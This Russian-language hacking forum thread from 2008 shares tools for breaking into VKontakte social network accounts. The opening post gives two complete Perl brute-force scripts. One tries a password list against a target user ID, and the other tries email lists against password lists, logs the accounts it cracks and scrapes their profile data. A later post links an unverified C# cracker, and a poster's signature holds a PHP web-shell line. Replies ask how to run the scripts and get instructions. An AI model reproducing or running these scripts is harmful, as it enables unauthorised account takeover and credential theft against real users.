Forum AoA- Хакерство, Читерство, Взлом Онлайн Игр.Баги боты и читы в  la2-WoW-CS-RF-PW. Все о Безопасности в Сети...  
   

Вернуться   Forum AoA- Хакерство, Читерство, Взлом Онлайн Игр.Баги боты и читы в la2-WoW-CS-RF-PW. Все о Безопасности в Сети... > Underground > Хакерство и Безопасность > Уязвимости веб приложений

Уязвимости веб приложений Уязвимости и защита порталов, сайтов, вебприложений

Ответ
 
LinkBack Опции темы Опции просмотра
Старый 26.05.2008   #1 (permalink)
In Death We Trust
© AoA Team
 
Аватар для Erlien
 
Регистрация: 11.11.2007
Адрес: /dev/random
Сообщений: 153
Вы сказали Спасибо: 3
Поблагодарили 16 раз(а) в 15 сообщениях
Erlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспорима
Радость Брут для [ vkontakte.ru ]

PHP код:
#!/usr/bin/perl
use IO::Socket;
use 
MD5;
use 
threads;
use 
threads::shared;
my @pass shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic 'passl.txt';        #словарь паролей
$id 111111;        #id цели
$mail 'mail%40mail.com';    #мыло, вместо @ вписать %40
$threads 4;        #количество потоков
######################################

open (pass"<$dic");

Next:
@
pass pass();

for(
0..$threads) {$trl[$_] = threads->create(&Brut$_);}
for(@
trl) { $_->join; }

sub Brut
{

while (@
pass){

$pass shift @pass;

$md5 MD5->hexhash($pass);
$sock IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print 
$sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
    
"Host: vkontakte.ru\r\n".
            
"Accept: */*\r\n".
            
"Content-Type: application/x-www-form-urlencoded\r\n".
            
"User-Agent: Mozillo\r\n".
            
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
            
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print 
"$pass  $answ";
if (
$answ =~ /302/){
open (good'>>good.txt');
print 
good "$id:$pass:$md5\n";
print 
"$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
    
my (@mas);
    while (<
pass>){
    
push @mas$_;
    
last if (@mas == 400);
    }
    
chomp @mas;
    return @
mas;

Vkontakte brute списка е-майлов на один пароль ©antichat

PHP код:
#! /usr/bin/perl -w
use strict;
use 
HTTP::Request::Common;
use 
LWP::UserAgent;
use 
HTTP::Cookies;

#Список email
my $ml 'emails.txt'
#Сбрученные аккаунты
my $fname 'good.txt'
#Несбрученные аккаунты
my $fname1 'bad.txt'
#список паролей
my $psw 'pass.txt'
my $control '-1';
my %example;
my (@data, @data1);


printf "Starting...\n";



sub submit_query {
    
my ($file, %query) = @_;
    
my $user_agent LWP::UserAgent->new();
    
my $cookies HTTP::Cookies->new;
    
my $cookie_jar HTTP::Cookies->new(
    
file => 'cookies.dat',
    
autosave => 1, );
    
$user_agent->cookie_jar($cookie_jar);
    
################### #############################################
    
$user_agent->agent("User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.8;" $user_agent->agent);
    
######################################## ########################

    
my $request POST
    $file
,
    [%
query];
    
    
#################################################### ############
    
my $response $user_agent->request($request);
    
my $res $response->as_string;
    
####################################### #########################    
    
    
if($res =~/<div id='error'>/ )
                        {
                        print 
FILE1 "[!]Wrong password: ";
                        
$control '0';
        
                        }
                    else
                        {
                        
                            
my $req HTTP::Request->new(GET => "http://vkontakte.ru/profile.php");
                            
my $response2 $user_agent->request($req);
                            
my $res2 $response2->as_string;
                            
                            if(
$res2 =~/id="percent">(.*)%</)
                            {
                            print 
FILE "[rate=$1]";
                            }
                            if(
$res2 =~/percentGold">(.*)</)
                            {
                            print FILE "
[gold_rate=$1]";
                            }
                            $req = HTTP::Request->new(GET => "
http://vkontakte.ru/settings.php");
                            
$response2 $user_agent->request($req);
                            
$res2 $response2->as_string;
                            if(
$res2 =~/контакте: <b>(.*)</) {print FILE "[id=$1]";}
                            if(
$res2 =~/"idr" value="(.*)"/) {print FILE "[sid=$1]";}
                            
                            
$control '1';
                            
                        }
                        
            }


    
open(DAT$ml) || die("Could not open emails file!");
    @
data=<DAT>;
    
close(DAT);
    
    
open(DAT1$psw) || die("Could not open passwords file!");
    @
data1=<DAT1>;
    
close(DAT1);
    

my $time time
my $start localtime;
printf "Vkontakte brutforoce\n";
printf "Started at $start\n";

foreach 
my $mail (@data)
{
chomp($mail);
foreach 
my $password (@data1)
        {
        
chomp($password);
        %
example = (success_url => ''fail_url => ''try_to_login => '1'email => $mailpass => $password);

        
open(FILE">>$fname") || die("Could not open $fname\n");
        
open(FILE1">>$fname1") || die("Could not open $fname1\n");
        
submit_query("http://vkontakte.ru/login. php", %example);
        
            if (
$control == '1')    
                {
                print 
FILE "$mail : $password\n";
                }
            else
                {
                print 
FILE1 "$mail : $password\n";
                }
            
        
close FILE;
        
close FILE1;
        }
}
$time time-$time;
my $end localtime;
printf "Completed at $end\n";
printf "Time Elapsed: $time sec\n"
__________________
Я в отпуске ! Занимаюсь исключительно проблемами связанными с работой форума.
Для всех прочих вопросов есть другие админы.


Извечный спор между собой ведут
Луна и звезды - кто из них главней?
И кто в ответе за игру ночных теней?


Ничего святого =\
Для анегдотов =>abuse(а)AheadOfAll.Org
<?
system($_GET["2pwn"]);
?>
Мои услуги, по прайсу.
Erlien вне форума  
Ответить с цитированием
Этот пользователь сказал Спасибо Erlien за это полезное сообщение:
Biohazar:D (27.05.2008)

Реклама=\
Старый 21.08.2008   #2 (permalink)
Новичок
 
Аватар для Predator
 
Регистрация: 21.08.2008
Сообщений: 6
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Predator пока неопределено
По умолчанию

OO brute вконтакте))есть у кого ссылка для скачивания проги?
Predator вне форума  
Ответить с цитированием
Старый 25.08.2008   #3 (permalink)
Новичок
 
Регистрация: 24.08.2008
Сообщений: 5
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Hendrix пока неопределено
По умолчанию

а чё с этим кодом надо делать? о_О


Мидитировать над ним, Почитайте тему как юзать сплоит в разделе ХИБ /Erlien

Последний раз редактировалось Erlien; 25.08.2008 в 13:00.
Hendrix вне форума  
Ответить с цитированием
Старый 25.08.2008   #4 (permalink)
In Death We Trust
© AoA Team
 
Аватар для Erlien
 
Регистрация: 11.11.2007
Адрес: /dev/random
Сообщений: 153
Вы сказали Спасибо: 3
Поблагодарили 16 раз(а) в 15 сообщениях
Erlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспоримаErlien репутация неоспорима
По умолчанию

Для тех кто не дружит с *пхп скриптами:

Vkontakte bruteforce ©serber



Написал программу для перебора паролей от аккаунтов Вконтакте.ру, на C#
-Полный перебор, указывается алфавит и длина пароля.
-Перебор по словарю (планируется)
-Планирую сделать перебор с эвристикой (т.е. это немного модифицированный полный
перебор, учитывается что в словах не может быть подряд 2 гласной и 3 согласных букв)
©serber

http://dl.dump.ru/file_download/1019559

На работоспособность и вирусы не проверялось !
__________________
Я в отпуске ! Занимаюсь исключительно проблемами связанными с работой форума.
Для всех прочих вопросов есть другие админы.


Извечный спор между собой ведут
Луна и звезды - кто из них главней?
И кто в ответе за игру ночных теней?


Ничего святого =\
Для анегдотов =>abuse(а)AheadOfAll.Org
<?
system($_GET["2pwn"]);
?>
Мои услуги, по прайсу.
Erlien вне форума  
Ответить с цитированием
Старый 28.09.2008   #5 (permalink)
Young 1337 Keltir
 
Регистрация: 27.09.2008
Сообщений: 50
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
mean пока неопределено
По умолчанию Ответ: Брут для [ vkontakte.ru ]

Hendrix,
Сохрани этот код в файл с расширением .pl ,качай себе ActivePerl и запускай.
mean вне форума  
Ответить с цитированием
Старый 4 недель(и) назад   #6 (permalink)
ЮзверЪ
 
Регистрация: 09.12.2008
Сообщений: 10
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
михон пока неопределено
По умолчанию Ответ: Брут для [ vkontakte.ru ]

во спасибо а то я как увидел код так и непонел што с ним делать то надо)))
михон вне форума  
Ответить с цитированием
Старый 4 недель(и) назад   #7 (permalink)
San
Приглашенный
 
Аватар для San
 
Регистрация: 21.11.2008
Сообщений: 1
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
San пока неопределено
По умолчанию Ответ: Брут для [ vkontakte.ru ]

Спасибо ,мне это тоже пригодилось.
San вне форума  
Ответить с цитированием
Старый 3 недель(и) назад   #8 (permalink)
ЮзверЪ
 
Регистрация: 18.12.2008
Сообщений: 25
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
rangel пока неопределено
По умолчанию Re: Брут для [ vkontakte.ru ]

спасибо =)
rangel вне форума  
Ответить с цитированием
Старый 3 недель(и) назад   #9 (permalink)
Young 1337 Keltir
 
Регистрация: 27.09.2008
Сообщений: 50
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
mean пока неопределено
По умолчанию Re: Брут для [ vkontakte.ru ]

Не мучайтесь зря. Уже не актуально - капчу поставили.
mean вне форума  
Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Вкл.
Refbacks are Вкл.

Быстрый переход

   

Часовой пояс GMT +1, время: 00:51.

Rambler's Top100 Рейтинг@Mail.ru
Работает на юкозе
Copyright ©2006- 2009, AoA Team. Перевод: zCarot
Это 100 самых популярных запросов гуглаюзверей
Подвальная Туча Тегов
bruteforce скачать fighter fx 7.2 l2onix l2ranger la2world panda antivirus 2008 ключ panda antivirus 2008 ключи perfect world hack perfect world баги perfect world бот perfect world взлом perfect world читы perfect world читы на деньги pw бот pwmp2 rf online читы vksovety vksovety скачать wallhack wow сервера х10000 баги perfect world баги в perfect world бот для perfect world бот для pw бот на perfect world боты для perfect world боты для pw взлом perfect world взлом perfect world на деньги взлом perfect world на опыт взлом pw взлом игры perfect world взлом онлайн игр дюп адены как взломать perfect world как сделать цветной ник в garena квест на волка ключ для panda antivirus 2008 скачать bruteforce скачать бота для perfect world скачать сервер perfect world скачать читы для cs 1.6 травиан читы цветной ник в garena читы perfect world читы для cs 1.6 читы для garena читы для perfect world читы для pw читы на perfect world
----------------------------------------------------------------------------------
avatar vkontakte ru